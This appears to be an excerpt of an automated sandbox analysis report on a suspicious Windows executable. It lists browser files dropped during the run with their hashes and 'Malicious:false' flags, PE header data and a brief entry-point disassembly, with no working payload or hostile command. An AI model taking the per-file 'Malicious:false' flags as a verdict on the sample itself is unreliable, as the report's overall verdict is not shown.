                                                                                                                                                                                                                                                                                    SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                    MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                    SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                    SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                    SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):122218
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                    MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                    SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                    SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                    SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):291
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                    MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                    SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                    SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                    SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):130866
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                    MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                    SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                    SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                    SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:57:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2677
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.983741779718597
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8ndwT0kcHpidAKZdA19ehwiZUklqehRy+3:8yPq+y
                                                                                                                                                                                                                                                                                    MD5:10B3898589A02774EA4DA15F02290816
                                                                                                                                                                                                                                                                                    SHA1:70185CFF124673FD26D40125047D357397EF66C9
                                                                                                                                                                                                                                                                                    SHA-256:D26C68CE95E4B6E3B12A7BACFCA0AE9E182C6E97DA0AB99C36F3BF50A8D8948D
                                                                                                                                                                                                                                                                                    SHA-512:E3704EFDDF303C3BBB7EA27209EF49B76744A41C88E769C85C77127628FD699B0DB2499D5D1B3E9C72215833275562262200C9ED04CFB50E1D26B3F36DEF8BB6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:57:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2679
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9972869301179346
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8ltdwT0kcHpidAKZdA1weh/iZUkAQkqehuy+2:8WPg9Qzy
                                                                                                                                                                                                                                                                                    MD5:E35C637C9E603C16F23C7E7473CDAD69
                                                                                                                                                                                                                                                                                    SHA1:B7B5B81BCB9DE4A28EFFEF67177B4E75F35C20C4
                                                                                                                                                                                                                                                                                    SHA-256:F21868776B7C5D78965DBFC3567C0368132E684531F1D39E44C612793C0A2DDC
                                                                                                                                                                                                                                                                                    SHA-512:31F3458E2190AFD981CACEAA870B20C3AB57197E37BD0BE2AFB4F2D49F3CA28BF6F72AEEB6D0B9489D2371EB493A46C046C7E5E18C9704A6C5B4C43FC9251793
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2693
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.008120929197635
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8xtdwT0ksHpidAKZdA14tseh7sFiZUkmgqeh7sYy+BX:8xQPInqy
                                                                                                                                                                                                                                                                                    MD5:0F9B675289029F89449C1867907B3052
                                                                                                                                                                                                                                                                                    SHA1:C7403C89597F02702B78B8F9D4563A0D05E87A62
                                                                                                                                                                                                                                                                                    SHA-256:FD028528C10BEA4FBAC9BF7B1FBAC127234E815A2F4573D046B58034C3809EF6
                                                                                                                                                                                                                                                                                    SHA-512:147F6C7F4B568DE0D6B73C919A3E48FEA13B3C910DB81583B0EFEA0357ABF2F8BC11D6166BAFB9C21C0505261FEB9BC8F755ACC9355C2A5447D8EE7162173E08
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:57:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2681
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.996449601466567
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8LdwT0kcHpidAKZdA1vehDiZUkwqehCy+R:8WPrQy
                                                                                                                                                                                                                                                                                    MD5:37756DA6B14346E52E8EAD3BF35AD1AB
                                                                                                                                                                                                                                                                                    SHA1:204F38A01233B86D8C2319452E87B1EBEFE25185
                                                                                                                                                                                                                                                                                    SHA-256:0C64EF83154127CF1E008C0815B552AABE5880F2CDBFA9DFACFD701C2EB92E9D
                                                                                                                                                                                                                                                                                    SHA-512:36027F4F674AFE27E282608F79156C4B1869C84BC23B6E62D1F1149BFB8A260B4BD512D5175B599736F31CD0571257753500811D6CB8FEF501C6581869773A25
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:57:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2681
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9853383368413597
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8btdwT0kcHpidAKZdA1hehBiZUk1W1qehEy+C:8bQPr9ky
                                                                                                                                                                                                                                                                                    MD5:AC4B0C05129312CE7BDAE94E4DE16B3B
                                                                                                                                                                                                                                                                                    SHA1:D54493F3E2121594E6C34893EA8379489D12B23E
                                                                                                                                                                                                                                                                                    SHA-256:B81F82DD0916413518AEE8C871DD28E6CFFD8D3CEBCC9EA9EF9DA3A710065E92
                                                                                                                                                                                                                                                                                    SHA-512:E49EDBD6654C806F3C21BC9F7252DD40C8A3DA86DA71E489A0E11E5519E3DDF59A81F8449AD0AD32C15EA840D8979C600B1EEA6D5B8FA8C83CC5E98617D09496
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:57:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2683
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9951460683486144
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8fdwT0kcHpidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbqy+yT+:86PLT/TbxWOvTbqy7T
                                                                                                                                                                                                                                                                                    MD5:CE09B5CF5B07FCDB6AD6C7CF54AC8CA0
                                                                                                                                                                                                                                                                                    SHA1:54EA2E7F8F252A448CF27D39DD328B64438AC519
                                                                                                                                                                                                                                                                                    SHA-256:E4F9ED6F56F6129C691170C12ECB0366DF94978F422A444E2A3735A587035553
                                                                                                                                                                                                                                                                                    SHA-512:07E79E34A53FEAE714A2418F7736D1E0093EB9FE8ADB6F57F1624EA924C6269B9ED54D529C2CB7BAB8C0E08899AF5975993ADF0CE9C09CD8D309FA9FA46352C4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (813)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):818
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.165542771644581
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:IdTLtTFNMidBHslgT9lCuABAT6k/K7uoB7HHHHHHHYqmffffffo:kFe6KlgZ01BAOkquSEqmffffffo
                                                                                                                                                                                                                                                                                    MD5:9E823781B688EE565E19C23CCDED779E
                                                                                                                                                                                                                                                                                    SHA1:9C9B67902727AA278AD6BAAA1E0EDA87FF6C0B2E
                                                                                                                                                                                                                                                                                    SHA-256:B1DE5FEAD3F8341A3DBFCC51B17AE97161599420E379ED63369BD392032D136D
                                                                                                                                                                                                                                                                                    SHA-512:01D0A99F41145FFAC900EC10593EC59BB44C578005B51342AEF02D931EFEF5BC43334A63378D643F4A258BBD12B3DDAD3A113FE61872CEA372A1E1C325F66615
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                    Preview:)]}'.["",["nascar track closing","winter park ski resort gondola","nasa astronauts stuck","new movies streaming","hilton honors devaluation","honey browser extension","louisiana meteor shower","bills patriots injury report"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":-2897169055230028149,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                    MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                    SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                    SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                    SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):132722
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.436342759568619
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:fXkJQ7O4N5dTm+syHEt4W3XdQ4Q6NuSr/nUW2i6o:fCQ7HTt/sHdQ4Q6NDfUW8o
                                                                                                                                                                                                                                                                                    MD5:D77ABCAFE3AAC96F200ACD44FBFE88D1
                                                                                                                                                                                                                                                                                    SHA1:DF652AC648E6349AD39E92B77443BC3D6506F34D
                                                                                                                                                                                                                                                                                    SHA-256:37C50C5F447472CFB212DEE1134FF9D4E00A8FE15BE6B2297682D78191FCAD19
                                                                                                                                                                                                                                                                                    SHA-512:BAD58E2B09C3C5ED8CBBF054F2037BD4BA109D50F635220B2B79A4AB4FF8B28E1997E38EF874072E671B608E3592449D8249F63E61B77193CDE02E8B4B98982E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):5162
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                                    MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                                    SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                                    SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                                    SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                                                    Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):1660
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                                    MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                                    SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                                    SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                                    SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3
                                                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.454638300665235
                                                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                    File name:gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File size:147'968 bytes
                                                                                                                                                                                                                                                                                    MD5:2e45d5934db7da8ff7b560a80ceb96ab
                                                                                                                                                                                                                                                                                    SHA1:e1d653b1a6acbacd6eb592041d21786ca3a633c8
                                                                                                                                                                                                                                                                                    SHA256:f2c2df5d625c6983881695ab53416c52aa574821e01074f607b6039e5d79e76f
                                                                                                                                                                                                                                                                                    SHA512:7caedba355fbf00ff68e17345ca7fdf79e2dba70c7284dc3bb7bfe4afc478f1f4ca4969ccf3080a391c138abf6f0d14b30e2832e3eaf4a3072519c08621c635a
                                                                                                                                                                                                                                                                                    SSDEEP:3072:lOBRrLUOPed9xOi756fJnhsRSK2C22/m4ESZo3XRYzXIkQfyIzdEpx:A/rLVPW0nsP2Xy+TJfVzW7
                                                                                                                                                                                                                                                                                    TLSH:B2E36C71A2C2A1B2CA4D33742A3E77FD9D709B222B04CDDBDBC4FC186E691D256B1416
                                                                                                                                                                                                                                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ag.....................`....................@...........................#.............................................(......
                                                                                                                                                                                                                                                                                    Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                                                                    Entrypoint:0x4185c0
                                                                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                    DLL Characteristics:NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                    Time Stamp:0x676198A3 [Tue Dec 17 15:28:35 2024 UTC]
                                                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                    Import Hash:8329c46c809815bc572f208fdd794284
                                                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                                                    je 00007F4CE8DB24E5h
                                                                                                                                                                                                                                                                                    jne 00007F4CE8DB24E3h
                                                                                                                                                                                                                                                                                    mov eax, 000046E8h
                                                                                                                                                                                                                                                                                    add byte ptr [ebx+eax+75h], dh
                                                                                                                                                                                                                                                                                    add dword ptr [eax-01754318h], edi
                                                                                                                                                                                                                                                                                    push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                                                    add dword ptr [eax-0175DD18h], edi
                                                                                                                                                                                                                                                                                    push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                                                    add dword ptr [eax-01747718h], edi
                                                                                                                                                                                                                                                                                    push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                                                    add dword ptr [eax-01746118h], edi
                                                                                                                                                                                                                                                                                    push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                                                    add dword ptr [eax-01740B18h], edi
                                                                                                                                                                                                                                                                                    push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                                                    add dword ptr [eax-00139518h], edi
                                                                                                                                                                                                                                                                                    push dword ptr [ecx]
                                                                                                                                                                                                                                                                                    rol dl, 00000010h
                                                                                                                                                                                                                                                                                    add ah, cl
                                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                                    push 00420553h
